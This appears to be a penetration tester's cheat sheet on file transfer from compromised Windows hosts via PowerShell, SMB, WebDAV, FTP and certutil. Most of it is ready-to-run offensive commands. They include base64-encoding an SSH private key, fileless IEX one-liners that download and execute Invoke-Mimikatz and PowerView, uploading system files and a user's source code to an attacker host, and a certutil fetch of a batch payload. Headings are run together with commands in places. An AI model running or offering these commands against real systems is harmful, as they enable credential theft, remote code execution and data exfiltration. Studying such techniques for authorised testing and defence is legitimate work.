Windows
POWERSHELL
Base64 Encode & Decode Lin -> Win
Check SSH Key MD5 Hash
md5sum id_rsaEncode SSH Key to Base64
cat id_rsa | base64 -w 0;echo
justimaginethisissomerandomhashbecauseyoudontcareandidontcare=Decoding SSH Key on Windows machine
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("justimaginethisissomerandomhashbecauseyoudontcareandidontcare="))Confirming the MD5 Hashes Match
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5Note: It's not always possible to use this method because cmd.exe has a maximum string length of 8191 characters. And also web shell may error because of this large strings.
Base64 Encode & Decode Win -> Lin
I explained above how to do encoding in Linux and decoding in Powershell, now I'll explain opposite: Encode in Powershell and decode in Linux
Encode File Using Powershell
# If you don't need to copy file to Clipboard, just delete that pipe
PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\2025_BloodHound.zip")) | Set-Clipboard
# Get hashDecode Base64 String in Linux
echo justimaginethisissomerandomhashbecauseyoudontcareandidontcare= | base64 -d > 2025_BloodHound.zip
# Or if you encoded file into clipboard, just paste output into file, and decode
base64 -d bhoutput.txt > BH_GRAPH.zipGet & Check Hash
PS C:\> Get-FileHash "C:\Tools\2025_BloodHound.zip" -Algorithm MD5 | select Hash
$ md5sum 2025_BloodHound.zipWeb Downloads
In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource.
File Download
#Syntax: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
#Syntax: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')
PS C:\> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"PowerShell DownloadString - Fileless Method. Fileless attacks work by using some operationg system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')Common Errors
Internet Explorer Error
PS C:\> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\carnifex17> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEXSSL/TLS Untrusted certificate error
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')PowerShell Web Uploads
PowerShell doesn't have a built-in upload fucntions, so we need to use Invoke-WebRequest. or Invoke-RestMethod. Also we can use uploadserver module for Python, to install it we should use:
pip3 install uploadserverTurn On Web Server with Upload
python3 -m uploadserverPowerShell Script to Upload a File to Python Upload Server
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\> Invoke-FileUpload -Uri http://13.13.13.13:8000/upload -File C:\Windows\System32\drivers\etc\hostsPowerShell Base64 Web Upload. Convert file to base64 and send it using Invoke-WebRequest with POST method.
PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://13.13.13.13:8000/ -Method POST -Body $b64nc -lvnp 8000echo <base64> | base64 -d -w 0 > hostsSMB
Downloads
Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshareCopy a File from the SMB Server
C:\> copy \\192.168.220.133\share\nc.exeBut in some scenarios there would be an error, which forbids us unauthentificated guest access, so we could creat a smb server with authentification
Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password testMount the SMB Server with Username and Password
C:\> net use n: \\192.168.220.133\share /user:test testUploads
SMB Uploads will be more tricky because companies usually block uploads to SMB, cause it could cause a huge problem. BUUUT we could use HTTP or HTTPS protocol in return. It's because when you use SMB, it will first attempt to connect using SMB protocol, and if there's no SMB share available, it'll try to connect using HTTP. But for this we need WebDav protocol, it enables a webserver to behave like a fileserver, which we need. First you need to install it
sudo pip install wsgidav cherootUsing the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymousConnecting to the Webdav Share. DavWWWRoot isn't a folder, it's a special keyword that tells WebDAV that we are connection to the root of WebDav server. You could use any existing directory when you are connecting, as example
sharefolder
C:\> dir \\13.13.13.13\DavWWWRootUploading Files using SMB
C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\DavWWWRoot\
C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\sharefolder\FTP
Downloads
Installing FTP Server python3 module
sudo pip3 install pyftpdlibSetting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21Transferring Files from an FTP Server Using Powershell
PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://13.13.13.13/file.txt', 'C:\Users\Public\ftp-file.txt')Create a Command File for the FTP Client and Download the Target File
C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\> more file.txt
This is a test fileUploads
For this we would also use peftpdlib but we need to specify the option --write to allow clients to upload files to our attack host.
Starting FTP Server
sudo python3 -m pyftpdlib --port 21 --writePowershell Upload File
PS C:\> (New-Object Net.WebClient).UploadFile('ftp://13.13.13.13/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')Create a Command File for the FTP Client to Upload a File
C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> byeCERTUTIL
File Transfer
PS C:\> certutil.exe -urlcache -split -f http://13.13.13.13:1337/youknowim.bat youknowim.batFile Encode
C:\> certutil -encode file1 encodedfileFile Decode
C:\> certutil -decode encodedfile file2